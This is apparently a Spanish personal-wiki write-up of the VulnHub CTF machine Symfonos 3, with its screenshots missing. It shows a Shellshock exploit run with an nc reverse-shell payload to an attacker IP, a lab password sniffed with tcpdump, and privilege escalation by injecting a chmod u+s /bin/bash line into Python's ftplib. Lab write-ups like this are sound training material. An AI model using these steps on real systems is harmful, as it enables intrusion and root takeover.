Notas de Luis

Hacemos el reconocimiento con nmap:

Y esta sería la página web que corre por el puerto 80:

Viendo el código fuente nos encontramos con esto:

Hacemos fuzzing web y nos encontramos con el directorio gate:

Seguimos haciendo fuzzing y nos encontramos con el directorio cerberus:

Y ahora si volvemos a hacer fuzzing, nos encontramos con el directorio tartarus (pero usando el diccionario common.txt):

Y dentro del código fuente tenemos esto:

De todos modos, si volvemos a hacer fuzzing desde la raíz pero usando el diccionario common.txt, vemos el directorio cgi-bin:

Y si hacemos fuzzing otra vez pero sobre el cgi-bin, vemos el directorio underworld:

Al tratarse de un cgi-bin, podemos pensar que estamos ante un shellshock, por lo que buscamos exploits en metasploit:

Establecemos la siguiente configuración en el exploit:

Y así nos debería quedar la configuración:

Y así debería funcionar, aunque podemos hacerlo de forma manual:

Nos lo bajamos:

Y ejecutamos el exploit de la siguiente manera:

php 34766.php -u http://192.168.0.72/cgi-bin/underworld/ -c "nc -e /bin/bash 192.168.0.63 443"

Y recibimos la conexión:

Vamos a descargar y ejecutar el pspy dentro de esta máquina para conocer si hay algo corriendo por detrás:

Y vemos que se está ejecutando un script con python2 dentro del directorio /opt:

Pero no tenemos permisos para acceder:

Pero sí podemos capturar el tráfico de red de este servicio usando tcpdump, por lo que primero listamos las interfaces de red:

Y ahora capturamos el tráfico de la interfaz .lo:

tcpdump -i lo -w captura.pcap

Y ahora este pcap vamos a compartirlo con mi máquina atacante para analizarlo con wireshark:

Y nos encontramos con una contraseña:

hades:PTpZTfU4vxgzvRBE

Y sabemos que hay otro usuario llamado hades, además de estar abierto el puerto 22:

Y tenemos acceso por ssh:

Y ahora sí tenemos acceso al directorio /opt:

Y vemos que podemos escribir dentro de este script:

Por tanto miramos a ver la librería ftplib para ver si la podemos editar e inyectar ahí un comando malicioso:

nano /usr/lib/python2.7/ftplib.py

Y al principio del todo añadimos la librería os para cambiar los permisos de la bash

import os
 
os.system("chmod u+s /bin/bash")
computing/hacking/ctf/vulnhub/maquina_symfonos_3.txt · Última modificación: por 127.0.0.1